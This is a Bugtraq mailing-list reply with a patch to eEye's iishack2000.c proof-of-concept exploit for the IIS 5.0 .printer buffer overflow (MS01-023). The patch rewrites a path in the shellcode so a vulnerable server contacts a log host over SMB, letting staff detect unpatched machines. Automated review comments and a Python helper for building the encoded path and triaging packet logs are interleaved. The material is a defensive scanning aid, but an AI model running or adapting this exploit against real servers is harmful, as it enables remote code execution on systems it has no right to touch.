Bugtraq mailing list archives

Re: Windows 2000 .printer remote overflow proof of concept exploit


From: Matt Power <mhpower () BOS BINDVIEW COM>
Date: Thu, 3 May 2001 00:28:58 -0400

       ... , will create a file called www.eEye.com.txt on the root of
drive c.
       ... This proof of concept exploit is not to be used as a
method of testing to see if you're vulnerable or not.

In some environments, security staff may be responsible for
identifying which IIS 5.0 servers, out of a large collection of them,
still do not have a fix in place for this vulnerability. The security
staff may not have any convenient way to check for the existence of
c:\www.eEye.com.txt on every server, and thus a proof-of-concept
exploit that provides a result observable over the network may be of
interest. One possibility, which involves only minor changes to the
code provided by eEye Digital Security, is to try to get the IIS 5.0
system to access a UNC share on a system controlled by the security
staff. I've appended a patch to iishack2000.c that implements this.

To use this, first obtain the original iishack2000.c from

  http://www.eeye.com/html/research/Advisories/iishack2000.c

The MD5 checksum of this is 1e8f76209ee0afaa7b6625a8ace48535. Then,
remove the control-M characters, e.g.,

  tr -d '\015' < iishack2000.c > iishack2000.c.tr; mv iishack2000.c.tr iishack2000.c

The MD5 checksum should then be c93b4d9040723fb03c6860a023f6df2b, and
the patch below can then be applied.

Example: the security staff operate a machine 10.0.0.1 that has some
way of logging any packets sent to it on tcp ports 139 and 445
(ipchains, IP Filter, etc.), and which normally sees no traffic on
those ports. The machine 10.0.0.2 is one of a large number of IIS 5.0
servers that might still have the MS01-023 vulnerability. The setup of
10.0.0.2 allows it to send SMB requests to 10.0.0.1, even though it
normally would not do so. The security staff run this program, e.g.,

  % iishack2000 10.0.0.2 80 0 10.0.0.1
  % iishack2000 10.0.0.2 80 1 10.0.0.1

and then look at the packet log files. If there are packets from
10.0.0.2 to 10.0.0.1 on tcp ports 139 or 445, then 10.0.0.2 is almost
certainly vulnerable. Otherwise, no evidence of a vulnerability has
been found.

Presumably more efficient methods will become available later, but
this one may be of interest since many organizations need to check
their IIS 5.0 servers now.

(Incidentally, I've tried the webexplt.pl recently posted by Wanderley
J. Abreu Jr., and for me it reports "The Machine tested has the IPP
Vulnerability!" on machines that have Microsoft's Q296576 patch.)

Matt Power
BindView Corporation, RAZOR Team
mhpower () bos bindview com


*** iishack2000.c.old   Wed May  2 23:58:17 2001
--- iishack2000.c       Wed May  2 23:58:17 2001
***************
*** 86,89 ****
  {
!       char request_message[500];
!       int X,sock,sp=0;
        unsigned short serverport=htons(80);
--- 86,89 ----
  {
!       char ip[16],request_message[500],unc[20];
!       int X,i,len,sock,sp=0;
        unsigned short serverport=htons(80);
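Review bot: ip[16] and unc[20] are sized to the byte for a 15-character dotted-quad (plus NUL) and for the 19 bytes that replace the 19-byte "c:\www.eEye.com.txt" string in the shellcode; add a comment stating both limits next to the declarations so that a later change to the path format (a longer share name, a hostname) does not silently overflow them.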
***************
*** 101,103 ****
        printf("Exploit by Ryan Permeh <ryan () eeye com>\n");
!       if(argc < 4) usage();
        if(argv[1] != NULL)
--- 101,103 ----
        printf("Exploit by Ryan Permeh <ryan () eeye com>\n");
!       if(argc < 5) usage();
        if(argv[1] != NULL)
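Review bot: raising the minimum to five arguments removes the original three-argument mode (the file-drop check) entirely. If that mode is still wanted, keep `if(argc < 4) usage();` and only take the UNC path when argc >= 5, making <log host> optional rather than mandatory.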
***************
*** 116,118 ****
        }       
!       printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
        memset(request_message,0x00,500);
--- 116,142 ----
        }       
!       if(argv[4] != NULL && strlen(argv[4]) <= 15)
!       {
!               strcpy(ip, argv[4]);
!               strcpy(&unc[2], argv[4]);
!               len = strlen(argv[4]);
!       }
!       else
!       {
!               strcpy(ip, "127.0.0.1");
!               strcpy(&unc[2], "127.0.0.1");
!               len = strlen("127.0.0.1");
!       }
!       unc[0] = '\\';
!       unc[1] = '\\';
!       unc[len + 2] = '\\';
!       for (i = 0; i < 16 - len; ++i)
!       {
!               unc[len + 3 + i] = 'A';
!       }
!       unc[19] = '\0';
!       for (i = 146; i <= 164; ++i)
!       {
!               sc[sp][i] = unc[i - 146] ^ 3;
!       }
!       printf("Sending string to overflow sp %d for host: %s on port:%d and contact 
%s\n",sp,inet_ntoa(attack),htons(serverport),ip);
        memset(request_message,0x00,500);
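Review bot: the else branch silently substitutes 127.0.0.1 when argv[4] is longer than 15 characters, so a mistyped log host (or one given as a hostname) makes the program report a check against localhost instead of failing; call usage() there instead. Since argc < 5 is already rejected, the `argv[4] != NULL` half of the condition is always true and can go. The offsets 146 and 164 and the XOR key 3 are tied to the layout of sc[] and deserve named constants or a comment explaining that they cover the 19-byte path in the shellcode.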
***************
*** 128,131 ****
                send(sock,request_message,strlen(request_message)*sizeof(char),0);
!               printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
!               printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try 
again with %d as the service pack)\n",sp==0?1:0);                
        }
--- 152,155 ----
                send(sock,request_message,strlen(request_message)*sizeof(char),0);
!               printf("Sent overflow, now look at logs on %s for SMB packets from %s\n",ip,inet_ntoa(attack));
!               printf("If no packets were logged, the server may be patched,\nor may be a different service pack (try 
again with %d as the service pack)\n",sp==0?1:0);                
        }
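Review bot: the "look at logs on %s for SMB packets" message should name the ports the operator has to filter on (tcp 139 and 445, as the accompanying mail does), e.g. "for tcp/139 or tcp/445 packets from %s"; when the 127.0.0.1 fallback fired earlier, this line is also the only place the operator can notice it, another reason to fail on a bad argument rather than substitute one.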
***************
*** 144,148 ****
  {
!       printf("Syntax:  iishack2000 <hostname> <server port> <service pack>\n");
!       printf("Example: iishack2000 127.0.0.1 80 0\n");
!       printf("Example: iishack2000 127.0.0.1 80 1\n");        
        exit(1);
--- 168,172 ----
  {
!       printf("Syntax:  iishack2000 <hostname> <server port> <service pack> <log host>\n");
!       printf("Example: iishack2000 127.0.0.1 80 0 10.0.0.1\n");
!       printf("Example: iishack2000 127.0.0.1 80 1 10.0.0.1\n");       
        exit(1);
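Review bot: the usage text should state that <log host> must be a dotted-quad IP address of at most 15 characters, since the argument check later in the program quietly replaces anything longer with 127.0.0.1; a one-line hint that the log host must see tcp/139 and tcp/445 from the target would also spare a reader from having to find the mailing-list post.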

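The following is an added example, not part of Matt Power's post or of eEye's iishack2000.c. It shows the two halves of the procedure above in Python: building the fixed-width UNC path the patch writes into the shellcode (19 bytes, the length of c:\www.eEye.com.txt, padded with 'A' and XORed with 3 as the patch does), and the log-side triage that turns "packets on tcp 139/445 from host X" into a vulnerable/no-evidence verdict. The log lines are constructed, in the ipchains "Packet log:" style, and the parser only relies on the `PROTO=6 src:sport dst:dport` fields; the function names and the decision to reject an over-long log host (where the patch silently falls back to 127.0.0.1) are this example's own choices.

```python
"""Network-observable check for the MS01-023 .printer overflow (added example)."""
import re
from typing import Dict, Iterable, List, Set

# The eEye shellcode carries a 19-byte path, c:\www.eEye.com.txt.  The patch
# overwrites it in place, so the replacement UNC path must be exactly this long.
PATH_LEN = 19
SMB_PORTS = {139, 445}
DOTTED_QUAD = re.compile(r"\d{1,3}(\.\d{1,3}){3}")  # at most 15 characters by construction


def build_unc_path(log_host: str) -> bytes:
    """Return \\\\<log_host>\\ padded with 'A' to PATH_LEN bytes, as the patch builds it.

    The patch accepts any argv[4] of at most 15 characters and falls back to
    127.0.0.1 otherwise; here a non-dotted-quad is an error instead (assumption).
    """
    if not DOTTED_QUAD.fullmatch(log_host):
        raise ValueError("log host must be a dotted-quad IP address (max 15 chars)")
    path = b"\\\\" + log_host.encode("ascii") + b"\\"
    return path + b"A" * (PATH_LEN - len(path))  # share name is the 'A' padding


def encode_for_shellcode(path: bytes) -> bytes:
    """XOR every byte with 3, the transformation the patch applies before
    storing the path at sc[sp][146..164]."""
    return bytes(b ^ 3 for b in path)


# Constructed ipchains-style entries for the log host 10.0.0.1; not real captures.
SAMPLE_LOG = [
    "Packet log: input DENY eth0 PROTO=6 10.0.0.2:1039 10.0.0.1:445 L=48 S=0x00 I=1234 F=0x4000 T=128 SYN (#1)",
    "Packet log: input DENY eth0 PROTO=6 10.0.0.2:1040 10.0.0.1:139 L=48 S=0x00 I=1235 F=0x4000 T=128 SYN (#1)",
    "Packet log: input DENY eth0 PROTO=6 10.0.0.4:2001 10.0.0.1:80 L=48 S=0x00 I=77 F=0x4000 T=64 SYN (#1)",
    "Packet log: input DENY eth0 PROTO=6 10.0.0.9:1041 10.0.0.1:445 L=48 S=0x00 I=90 F=0x4000 T=128 SYN (#1)",
]

LOG_RE = re.compile(r"PROTO=6 (\d+\.\d+\.\d+\.\d+):(\d+) (\d+\.\d+\.\d+\.\d+):(\d+)")


def smb_sources(log_lines: Iterable[str], log_host: str) -> Set[str]:
    """Source addresses that sent TCP packets to log_host on port 139 or 445."""
    sources: Set[str] = set()
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not a TCP packet log line
        src, _sport, dst, dport = m.groups()
        if dst == log_host and int(dport) in SMB_PORTS:
            sources.add(src)
    return sources


def triage(candidates: List[str], log_lines: Iterable[str], log_host: str) -> Dict[str, str]:
    """Map each candidate IIS server to the verdict the post describes:
    SMB traffic seen -> almost certainly vulnerable; nothing seen -> no evidence."""
    seen = smb_sources(log_lines, log_host)
    return {
        host: ("almost certainly vulnerable" if host in seen else "no evidence of vulnerability")
        for host in candidates
    }


if __name__ == "__main__":
    path = build_unc_path("10.0.0.1")
    print(path, len(path), encode_for_shellcode(path).hex())
    for host, verdict in triage(["10.0.0.2", "10.0.0.3", "10.0.0.4"], SAMPLE_LOG, "10.0.0.1").items():
        print(f"{host}: {verdict}")
```

The triage deliberately ignores 10.0.0.4's connection to port 80 and the non-candidate 10.0.0.9, since the post's evidence is specifically SMB traffic from the host that was just sent the overflow; a connection from a host you did not probe is worth a separate look but is not a result of this check.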
